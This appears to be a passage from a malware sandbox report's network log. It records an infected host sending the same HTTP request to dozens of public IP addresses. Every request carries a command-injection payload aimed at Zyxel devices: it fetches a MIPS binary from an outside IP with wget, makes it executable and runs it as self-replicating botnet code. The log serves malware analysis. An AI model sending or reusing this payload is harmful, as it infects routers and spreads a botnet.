                                                        Feb 2, 2024 06:21:12.989075899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5093192.168.2.144990436.64.96.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989114046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5094192.168.2.1434094157.178.112.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989157915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5095192.168.2.143917273.130.214.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989198923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5096192.168.2.145606689.139.126.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989232063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5097192.168.2.144575462.55.112.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989257097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5098192.168.2.1438062185.23.75.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989315033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5099192.168.2.1454092193.174.145.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989355087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5100192.168.2.1455848152.16.196.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989372969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5101192.168.2.144896498.34.178.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989412069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5102192.168.2.1437124152.123.12.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989466906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5103192.168.2.1442326136.210.186.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989506960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5104192.168.2.143584039.132.6.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989537954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5105192.168.2.145372044.16.160.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989568949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5106192.168.2.1443316155.180.91.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989613056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5107192.168.2.1452608211.47.72.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989675045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5108192.168.2.144048494.70.241.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989701986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5109192.168.2.1460324199.115.235.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989729881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5110192.168.2.1446152186.167.127.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989762068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5111192.168.2.14581265.226.95.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989815950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5112192.168.2.1451674113.125.248.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989849091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5113192.168.2.1453740190.216.194.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989872932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5114192.168.2.1449458132.207.147.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989912033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5115192.168.2.1460204176.168.204.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989949942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5116192.168.2.145830066.208.156.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989979982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5117192.168.2.1454090162.11.189.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990020990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5118192.168.2.144267632.222.223.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990076065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5119192.168.2.1436978172.93.28.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990104914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5120192.168.2.1442652168.134.131.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990154028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5121192.168.2.1440728121.20.46.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990195990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5122192.168.2.1434028172.115.223.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990219116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5123192.168.2.1435638141.149.119.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990252018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5124192.168.2.143919282.82.18.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990295887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5125192.168.2.1460302223.206.210.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990339994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5126192.168.2.1450716180.243.214.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990371943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5127192.168.2.1446422181.135.71.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990401983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5128192.168.2.146052662.54.38.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990458012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5129192.168.2.1455518217.93.16.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990473986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5130192.168.2.1433534193.32.124.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990535021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5131192.168.2.1460996105.144.187.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990573883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5132192.168.2.143374659.47.69.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990607977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5133192.168.2.144942082.202.78.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990636110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5134192.168.2.1457762129.40.64.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990665913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5135192.168.2.1437102136.168.218.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990700006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5136192.168.2.145397851.11.62.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990737915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5137192.168.2.1441488101.26.99.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990758896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5138192.168.2.1449476184.86.158.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990803957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5139192.168.2.1433302219.226.172.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990854025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5140192.168.2.1435286204.166.236.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990884066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5141192.168.2.145003827.249.176.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990932941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5142192.168.2.1437338121.11.210.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.990962982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5143192.168.2.1452298174.35.250.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991008043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5144192.168.2.1451652147.2.81.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991044998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5145192.168.2.145769068.169.167.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991071939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5146192.168.2.145213254.22.198.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991130114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5147192.168.2.144429672.88.208.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991147041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5148192.168.2.1433332179.233.115.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991187096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5149192.168.2.1454708186.48.239.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991230965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5150192.168.2.1433854129.90.185.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991269112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5151192.168.2.145127087.99.67.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991312027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5152192.168.2.143288439.234.86.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991350889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5153192.168.2.143695235.54.122.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991368055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5154192.168.2.1443234167.186.238.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991398096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5155192.168.2.1460384149.141.145.39443
                                                        TimestampBytes transferredDirectionData
